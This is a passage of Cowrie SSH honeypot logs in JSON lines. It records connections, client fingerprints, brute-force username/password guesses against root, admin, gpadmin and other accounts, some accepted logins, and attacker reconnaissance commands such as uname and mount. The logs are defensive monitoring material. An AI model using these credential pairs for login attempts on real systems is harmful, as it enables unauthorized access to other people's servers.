25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:32:30.928464Z","src_ip":"212.227.235.229","session":"fa501b9adc54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50018,"dst_ip":"1.2.3.4","dst_port":22,"session":"d00fa899152d","protocol":"ssh","message":"New connection: 212.227.125.160:50018 (1.2.3.4:22) [session: d00fa899152d]","sensor":"my-vps","timestamp":"2025-08-31T02:32:34.119031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:32:34.610136Z","src_ip":"212.227.125.160","session":"d00fa899152d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:32:34.610910Z","src_ip":"212.227.125.160","session":"d00fa899152d"}
{"eventid":"cowrie.login.failed","username":"es","password":"1234567","message":"login attempt [es/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T02:32:37.057208Z","src_ip":"212.227.125.160","session":"d00fa899152d"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:32:38.727763Z","src_ip":"212.227.125.160","session":"d00fa899152d"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":42600,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2b93a9ae833","protocol":"ssh","message":"New connection: 41.226.27.251:42600 (1.2.3.4:22) [session: a2b93a9ae833]","sensor":"my-vps","timestamp":"2025-08-31T02:32:48.551010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:32:48.604190Z","src_ip":"41.226.27.251","session":"a2b93a9ae833"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:32:48.605719Z","src_ip":"41.226.27.251","session":"a2b93a9ae833"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:32:48.780412Z","src_ip":"41.226.27.251","session":"a2b93a9ae833"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:32:50.054482Z","src_ip":"41.226.27.251","session":"a2b93a9ae833"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38542,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4ba1573546b","protocol":"ssh","message":"New connection: 212.227.125.160:38542 (1.2.3.4:22) [session: a4ba1573546b]","sensor":"my-vps","timestamp":"2025-08-31T02:32:55.494075Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:32:56.602787Z","src_ip":"212.227.125.160","session":"a4ba1573546b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:32:56.609017Z","src_ip":"212.227.125.160","session":"a4ba1573546b"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":33774,"dst_ip":"1.2.3.4","dst_port":22,"session":"98cba1d59973","protocol":"ssh","message":"New connection: 41.226.27.251:33774 (1.2.3.4:22) [session: 98cba1d59973]","sensor":"my-vps","timestamp":"2025-08-31T02:33:08.751730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:33:08.761693Z","src_ip":"41.226.27.251","session":"98cba1d59973"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:33:08.795344Z","src_ip":"41.226.27.251","session":"98cba1d59973"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:33:08.970026Z","src_ip":"41.226.27.251","session":"98cba1d59973"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:33:09.073976Z","src_ip":"41.226.27.251","session":"98cba1d59973"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:33:09.074693Z","src_ip":"41.226.27.251","session":"98cba1d59973"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:33:09.126319Z","src_ip":"41.226.27.251","session":"98cba1d59973"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:33:09.127476Z","src_ip":"41.226.27.251","session":"98cba1d59973"}
{"eventid":"cowrie.login.success","username":"root","password":"Kh9912fc!","message":"login attempt [root/Kh9912fc!] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:33:09.851819Z","src_ip":"212.227.125.160","session":"a4ba1573546b"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":35422,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c638533dcad","protocol":"ssh","message":"New connection: 201.148.180.50:35422 (1.2.3.4:22) [session: 2c638533dcad]","sensor":"my-vps","timestamp":"2025-08-31T02:33:10.861014Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56012,"dst_ip":"1.2.3.4","dst_port":22,"session":"d757d33c4a66","protocol":"ssh","message":"New connection: 212.227.125.160:56012 (1.2.3.4:22) [session: d757d33c4a66]","sensor":"my-vps","timestamp":"2025-08-31T02:33:11.019680Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41060,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e53419cf339","protocol":"ssh","message":"New connection: 212.227.235.229:41060 (1.2.3.4:22) [session: 7e53419cf339]","sensor":"my-vps","timestamp":"2025-08-31T02:33:13.014627Z"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:33:13.074147Z","src_ip":"201.148.180.50","session":"2c638533dcad"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:33:13.736970Z","src_ip":"212.227.235.229","session":"7e53419cf339"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:33:13.737873Z","src_ip":"212.227.235.229","session":"7e53419cf339"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:33:14.399095Z","src_ip":"212.227.125.160","session":"a4ba1573546b"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T02:33:14.399871Z","src_ip":"212.227.125.160","session":"a4ba1573546b"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin123","message":"login attempt [gpadmin/gpadmin123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:33:14.802545Z","src_ip":"212.227.125.160","session":"6e87e16ce03f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"2.3","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:33:16.747846Z","src_ip":"212.227.125.160","session":"a4ba1573546b"}
{"eventid":"cowrie.session.closed","duration":"21.3","message":"Connection lost after 21.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:33:16.778410Z","src_ip":"212.227.125.160","session":"a4ba1573546b"}
{"eventid":"cowrie.login.failed","username":"es","password":"12345678","message":"login attempt [es/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T02:33:19.878463Z","src_ip":"212.227.235.229","session":"7e53419cf339"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:33:21.709336Z","src_ip":"212.227.235.229","session":"7e53419cf339"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:33:22.446892Z","src_ip":"212.227.125.160","session":"d757d33c4a66"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:33:22.447837Z","src_ip":"212.227.125.160","session":"d757d33c4a66"}
{"eventid":"cowrie.session.closed","duration":"97.9","message":"Connection lost after 97.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:33:26.884257Z","src_ip":"212.227.125.160","session":"6e87e16ce03f"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin123","message":"login attempt [gpadmin/gpadmin123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:33:27.015241Z","src_ip":"212.227.235.229","session":"fa501b9adc54"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44870,"dst_ip":"1.2.3.4","dst_port":22,"session":"02b2e53703f0","protocol":"ssh","message":"New connection: 41.226.27.251:44870 (1.2.3.4:22) [session: 02b2e53703f0]","sensor":"my-vps","timestamp":"2025-08-31T02:33:29.235339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:33:29.236480Z","src_ip":"41.226.27.251","session":"02b2e53703f0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:33:29.280218Z","src_ip":"41.226.27.251","session":"02b2e53703f0"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:33:29.413412Z","src_ip":"41.226.27.251","session":"02b2e53703f0"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:33:30.683949Z","src_ip":"41.226.27.251","session":"02b2e53703f0"}
{"eventid":"cowrie.session.closed","duration":"79.7","message":"Connection lost after 79.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:33:33.895323Z","src_ip":"212.227.235.229","session":"fa501b9adc54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59680,"dst_ip":"1.2.3.4","dst_port":22,"session":"d17d05cec3be","protocol":"ssh","message":"New connection: 212.227.125.160:59680 (1.2.3.4:22) [session: d17d05cec3be]","sensor":"my-vps","timestamp":"2025-08-31T02:33:34.404400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:33:34.908660Z","src_ip":"212.227.125.160","session":"d17d05cec3be"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:33:34.909417Z","src_ip":"212.227.125.160","session":"d17d05cec3be"}
{"eventid":"cowrie.login.failed","username":"es","password":"12345678","message":"login attempt [es/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T02:33:37.595100Z","src_ip":"212.227.125.160","session":"d17d05cec3be"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:33:39.183697Z","src_ip":"212.227.125.160","session":"d17d05cec3be"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:33:44.928792Z","src_ip":"212.227.125.160","session":"d757d33c4a66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55624,"dst_ip":"1.2.3.4","dst_port":22,"session":"d22614bd3d99","protocol":"ssh","message":"New connection: 212.227.235.229:55624 (1.2.3.4:22) [session: d22614bd3d99]","sensor":"my-vps","timestamp":"2025-08-31T02:33:46.108296Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":46046,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcb0a334659d","protocol":"ssh","message":"New connection: 41.226.27.251:46046 (1.2.3.4:22) [session: fcb0a334659d]","sensor":"my-vps","timestamp":"2025-08-31T02:33:49.807995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:33:49.809035Z","src_ip":"41.226.27.251","session":"fcb0a334659d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecd